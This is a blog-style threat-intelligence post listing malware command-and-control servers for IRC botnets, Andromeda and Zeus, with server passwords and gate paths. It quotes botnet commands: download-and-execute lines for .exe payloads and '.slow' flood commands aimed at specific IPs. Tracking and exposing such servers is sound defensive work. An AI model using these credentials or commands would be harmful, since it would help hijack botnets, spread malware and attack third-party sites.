199.119.226.75 (Barracuda irc botnet hosted by France Paris Dnsslave.com)

Server:   199.119.226.75 Port:  6667 Channel:  #Aryan Oper: [Paradoxun] (Paradoxun@rofl12345): … [Paradoxun] ~#Aryan [Paradoxun] 199.119.226.75 :Lee’s [Paradoxun] idle 00:03:03, signon: Sat Nov 24 13:31:20 [Paradoxun] End of WHOIS list. You may remember Paradoxun from here or here It looks like he may have some aryan bots in the channel as well. Paradoxun .botkill -s Paradoxun

f0001.info (ngrbot irc botnet hosted by United States Chicago Steadfast Networks)

Resolved f0001.info to 208.117.34.204, 208.117.34.20 Server:  f0001.info Port:  1887 Server password:  leonis Channel:  #pool Channel password:  leonis * Topic for #pool is: ~pu hxxp://hotfile.com/dl/180565282/bc43943/queriendo.exe 3ea04ecdc19fad85fdf2eb15ba20cc9a ~s -o ~s * Topic for #pool set by google at Fri Nov 23 10:26:12 2012 Channel:  #XP * Topic for #xp is: ~dw hxxp://hotfile.com/dl/180565391/ee7fa0b/ccc.exe 55c6bf0eac7a786de324c7f34ef6db12 ~dw hxxp://hotfile.com/dl/180565492/0dd28c1/10.exe ee2dcac3f9f630c69dd750cc6abc5b8a *

apocsvr.info (Andromeda http malware hosted by vHostLayer.com)

Server:   apocsvr.info Gate file:  /andro/image.php This is just the standard cracked andro, but I noticed something interesting about it. The domain is whoisguard protected, which is often used by skids who don’t want to spend 30 seconds making up fake info for the whois. However I noticed something in the assembly info of the

smartnet.taess.net (Zeus banking malware and other crap hosted by Germany Frankfurt Am Main Ovh Gmbh)

Resolved smartnet.taess.net to 94.23.160.203 Zeus Server:  smartnet.taess.net Gate file:  smartnet.taess.net/directory/gate.php Config file:  smartnet.taess.net/directory/config.bin Hosting zeus on a free host seems like a great idea. Bonus “secure soft” bot from the same guy Server:  lagner.taess.net Gate file:  /Vote%20Gateway%20%20%20blabla%20%20%20Metin2%20P-Server%20Liste_files/Admin/acces/update/connect.php He was using this to ddos israeli sites during the gaza bombardment. Germany strikes again. Stats panel Loading

37.221.171.139 (ngr irc botnet hosted by Germany Frankfurt Am Main Voxility S.r.l.)

Server:  37.221.171.139 Port:  1234 Server password:  secret Channel:  #nigg Channel password:  secret Topic for #nigg is: .slow 80.82.64.21 80 .slow 77.81.243.156 80 .slow 199.59.166.134 80 .slow 77.81.243.156 80 Topic for #nigg set by pb at Wed Nov 21 14:38:45 2012 Oper:  pb!abuse@boss Checking out the ips it looks like he is attacking carding/dumps websites swiped.su

Multiple barracuda http bots hosted by Russian Federation Moscow Pallada Web Service Llc

This is the new ip of Tropical Paradise’s shared hosting for his shitty .net http bot. Domain:  anet.h4ck.me Gate file:  /endless14/bot.php Domain:  deamonscentral.no-ip.info Gate file:  /phpadmin141/bot.php Domain:  fofogogo23http.no-ip.biz Gate file:   /liquified61/bot.php Domain:  barracudasecurity.tk Gate file:  bot.php It looks like he’s finally figured out that leaving the panel in the root directory is a bad